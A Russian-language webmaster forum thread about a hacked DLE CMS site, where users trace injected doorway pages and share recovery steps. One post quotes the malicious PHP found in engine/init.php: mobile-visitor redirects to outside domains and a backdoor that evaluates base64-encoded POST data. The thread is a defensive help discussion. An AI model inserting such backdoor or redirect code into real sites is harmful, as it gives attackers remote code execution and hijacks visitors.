Вирус на сайте cms dle

Сегодня в гугл вебмастер увидел такое сообщение:

vBulletin Update Available

У меня таких ссылок просто нет на сайте. Перехожу по ссылкам. Вижу фейковый форум. Как будто мой. Во 2 посте ссылка СКАЧАТЬ и перенаправляет на:

http://fi1luesfour.h6pt.net.ua/?r=1032&q=2%20%F1%E8%EC%20%EA%E0%F0%F2%FB%20%F1%EE%ED%E8%20%FD%F0%E8%EA%F1%EE%ED%E0

Ссылок ведущих с моего сайта на эту байду просто нет. Видимо взломали. Только каким образом? В базе данных ничего такого нет.

Может кто уже столкнулся с похожим?

---------- Добавлено 17.01.2014 в 23:36 ----------

Таки нашел уже что случилось. Новый вид вируса на DLE. По снимкам появился на сервере 9 января 2014 года.

Закачивает на сервер папку.

site.ru\engine\editor\jscripts\tiny_mce\plugins\insertdatetime\jquery\

Буду искать где прописалась эта штука. По крайней мере нашел в engine\init.php. Там инклюд на этот плагин.

include '/var/www/54545454/data/www/site.ru/engine/editor/jscripts/tiny_mce/plugins/insertdatetime/jquery/jquery.php';

Появляется папка jquery. В ней куча файлов. На данный момент у меня в гугле находится больше 3000 лишних страниц, которые не соответсвуют моему сайту.

Все очень просто, залили вам доров, рекомендую проверять не только на доры ваши сайты, так же на шеллы и сам хостинг.

Ребятки помогите пожалуйста, у меня вот тоже такая проблема, нашла по вашей подсказке

в файле /engine/init.php этот код, найти нашла, а что с ним делать не знаю, как его отредактировать чтобы не повредить сайт?

А еще может еще где, в каком файле могут быть ?

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");



if ($iphone || $android || $palmpre || $ipod || $berry === true) { 

    header('Location: http://statuses.ws/');

}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://googlecount.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://getinternet.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));$category_skin = "";

Проблему решила, следующим образом в этих 2х файлах был вредоносный код

engine/engine.php

engine/int.php

скачала такую же версию движка и перекинула эти файлы!!!

Все работает)))))))

Во всяком случи у меня.

Настенька1, дырки скорее всего не закрыли, значит появится снова, да и следы от statuses.ws в 5и файлах убирать надо

Сможете помочь с этим, объясним по подробней??))

если есть уязвимость в скриптах то удаление последствий взлома не поможет, через какое то время опять будут проблемы.

нужен комплекс мер.

Вы знаете в каком порядке и что нужно делать,буду признательна если поможете..??

знаю, но к сожалению платно

Да залейте движок наново шаблон и модули если есть перенесите да и все, можно еще хостеру написать что б у себя проверил.